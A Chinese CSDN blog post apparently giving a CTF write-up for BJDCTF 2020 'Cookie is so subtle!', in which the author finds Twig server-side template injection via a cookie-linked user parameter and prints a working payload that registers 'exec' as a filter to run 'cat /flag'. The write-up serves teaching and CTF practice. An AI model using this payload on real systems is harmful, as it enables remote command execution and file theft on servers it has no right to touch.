BJDCTF-2020-Web-Cookie is so subtle!(ssti模板注入+cookie处注入)

本文探讨了一种常见的安全漏洞——SSTI(Server-Side Template Injection),通过博客作者的发现,详细介绍了如何在检查cookie和flag界面时察觉到注入迹象。经过测试验证了存在Twig模板注入,并提供了注入payload。同时,提到了参考链接以深入理解SSTI漏洞及其利用方法。
摘要由CSDN通过智能技术生成

既然提示了是和cookie有关系
那么先看cookie在这里插入图片描述
没什么东西
然后去flag界面查看一下

发现多了一个user参数
在这里插入图片描述
在这里插入图片描述
这里存在注入

考虑可能是SSTI注入
尝试一下

123{{9+9}}

在这里插入图片描述
确实可以
存在twig模板注入

payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

在这里插入图片描述
参考链接:https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BSSTI%E6%BC%8F%E6%B4%9E/#2-Twig

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值